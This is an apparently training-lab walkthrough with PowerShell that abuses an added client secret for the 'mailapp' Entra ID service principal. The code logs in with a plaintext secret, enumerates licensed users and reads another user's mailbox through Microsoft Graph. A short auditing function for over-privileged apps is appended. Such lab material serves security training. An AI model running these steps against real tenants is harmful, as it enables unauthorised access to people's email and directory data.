Learning Objective 12

Task

In the Attack Lab:

  1. Login to the Pharma Corp tenant as ‘mailapp’ by using the credentials added earlier.
     − Check the current API Permissions assigned to the service principal.

  2. Read the email content of [email protected].

Applies to: Attack Lab

Topic Covered: Credential Abuse and MS Graph API Permission Abuse

Solution

In Learning Objective 11, we added a new credential for the "mailapp" enterprise application.

We will use these credentials to log in using the Az PowerShell module.

# The client secret is the credential added to the "mailapp" application in Learning Objective 11.
$password = ConvertTo-SecureString 'Tey8Q~S3o84UUg7I_ZAIk7DYI4eNCYE5hy1auaoa' -AsPlainText -Force

# For a service principal login the "username" is the application (client) ID, not a UPN.
$creds = New-Object System.Management.Automation.PSCredential('f0823e33-c430-4dd2-a56a-dca3c3a346a4', $password)

# Authenticate as the service principal against the Pharma Corp tenant.
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant e0f999c1-86ee-47a0-bfd5-18470154b7cd

# Request a Microsoft Graph access token for the signed-in service principal and list the
# app role assignments (application permissions) granted to the mailapp service principal.
$GraphToken = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
$Params = @{
    "URI"     = "https://graph.microsoft.com/v1.0/servicePrincipals/4a9a9c00-bf17-43d8-b437-fe8144c8df15/appRoleAssignments"
    "Method"  = "GET"
    "Headers" = @{
        "Authorization" = "Bearer $GraphToken"
        "Content-Type"  = "application/json"
    }
}
$RoleAssignments = Invoke-RestMethod @Params -UseBasicParsing
# Each entry carries the appRoleId GUID of the permission and the resourceDisplayName it applies to.
$RoleAssignments.value

# Enumerate users and keep only those holding a license, i.e. the users likely to have a mailbox.
# Note: `$top=500 fetches a single page; larger tenants would need to follow @odata.nextLink.
$GraphToken = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
$URL = "https://graph.microsoft.com/v1.0/users?`$top=500"
$Params = @{
    "URI"     = $URL
    "Method"  = "GET"
    "Headers" = @{
        "Content-Type"  = "application/json"
        "Authorization" = "Bearer $GraphToken"
    }
}
$Users = Invoke-RestMethod @Params -UseBasicParsing
foreach ($User in $Users.value)
{
    $UserID = $User.id
    $URL = "https://graph.microsoft.com/v1.0/users/$UserID/licenseDetails"
    $Params = @{
        "URI"     = $URL
        "Method"  = "GET"
        "Headers" = @{
            "Content-Type"  = "application/json"
            "Authorization" = "Bearer $GraphToken"
        }
    }
    $LicenseDetails = Invoke-RestMethod @Params -UseBasicParsing
    # An unlicensed user returns an empty value array; skip those.
    if ($LicenseDetails.value)
    {
        [PSCustomObject]@{
            ID                = $User.id
            DisplayName       = $User.displayName
            UserPrincipalName = $User.userPrincipalName
            # A user may hold several SKUs; join them into one field.
            LicenseType       = ($LicenseDetails.value.skuPartNumber -join ', ')
        }
    }
}

# Read the mailbox of the target user (object ID taken from the licensed-user listing above).
# With an application permission such as Mail.Read this works for any mailbox in the tenant
# unless an Exchange application access policy scopes the app to specific mailboxes.
$GraphToken = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
$URL = "https://graph.microsoft.com/v1.0/users/0505af70-fea0-4dc9-8a8e-89cb1d0a16c5/messages"
$Params = @{
    "URI"     = $URL
    "Method"  = "GET"
    "Headers" = @{
        "Content-Type"  = "application/json"
        "Authorization" = "Bearer $GraphToken"
    }
}
$Emails = Invoke-RestMethod @Params -UseBasicParsing
$Emails.value
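The appRoleAssignments call in step 1 returns only appRoleId GUIDs. The following PowerShell function, an added example and not part of the lab solution, resolves those GUIDs to permission names by reading the appRoles of the Microsoft Graph service principal, and flags mailbox-wide permissions such as Mail.Read for review, which is the check an auditor would run to find over-privileged applications. It assumes an existing Az session from Connect-AzAccount whose token can read service principals; the service principal ID in the usage call is the one from the lab.

```powershell
# Added example (not part of the lab solution): resolve appRoleId GUIDs from
# .../servicePrincipals/{id}/appRoleAssignments into Graph permission names.
# Assumes an existing Az session (Connect-AzAccount) that can read servicePrincipals.
function Get-GraphAppPermissionNames {
    param(
        [Parameter(Mandatory)] [string] $ServicePrincipalId
    )
    $token   = (Get-AzAccessToken -ResourceUrl https://graph.microsoft.com).Token
    $headers = @{ "Authorization" = "Bearer $token"; "Content-Type" = "application/json" }

    # The Microsoft Graph resource service principal has the well-known appId below; its
    # appRoles collection maps each application-permission GUID to a name such as Mail.Read.
    $graphSpUri = "https://graph.microsoft.com/v1.0/servicePrincipals?`$filter=appId eq '00000003-0000-0000-c000-000000000000'&`$select=id,appRoles"
    $graphSp    = (Invoke-RestMethod -Uri $graphSpUri -Method GET -Headers $headers).value[0]
    $roleNames  = @{}
    foreach ($role in $graphSp.appRoles) { $roleNames[$role.id] = $role.value }

    $assignUri   = "https://graph.microsoft.com/v1.0/servicePrincipals/$ServicePrincipalId/appRoleAssignments"
    $assignments = (Invoke-RestMethod -Uri $assignUri -Method GET -Headers $headers).value

    foreach ($a in $assignments) {
        # Only assignments against the Graph resource can be resolved with this table;
        # other resource APIs (e.g. SharePoint) would need their own appRoles lookup.
        if ($a.resourceId -eq $graphSp.id) { $name = $roleNames[$a.appRoleId] }
        else                               { $name = "<non-Graph resource>" }
        [PSCustomObject]@{
            Resource    = $a.resourceDisplayName
            AppRoleId   = $a.appRoleId
            Permission  = $name
            # Mail.* application permissions cover every mailbox in the tenant, so they
            # deserve review unless paired with an Exchange application access policy.
            MailboxWide = ($name -like 'Mail.*' -or $name -like 'MailboxSettings.*')
        }
    }
}

# Usage: the mailapp service principal from the lab.
Get-GraphAppPermissionNames -ServicePrincipalId '4a9a9c00-bf17-43d8-b437-fe8144c8df15' | Format-Table -AutoSize
```

Rows with MailboxWide set to True are the permissions that let an application read any user's mail without that user's involvement.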
